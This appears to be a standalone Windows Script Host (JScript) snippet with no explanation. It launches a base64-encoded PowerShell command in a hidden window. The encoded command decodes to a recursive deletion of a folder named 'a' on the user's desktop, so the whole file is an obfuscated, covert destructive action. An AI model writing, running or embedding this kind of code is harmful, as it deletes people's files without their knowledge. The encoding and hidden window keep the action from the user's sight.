c="powershell.exe -enc UgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQBcAEQAZQBzAGsAdABvAHAAXABhACAALQByAGUAYwB1AHIAcwBlAA==";
new ActiveXObject("WScript.Shell").Run(c,0,true);
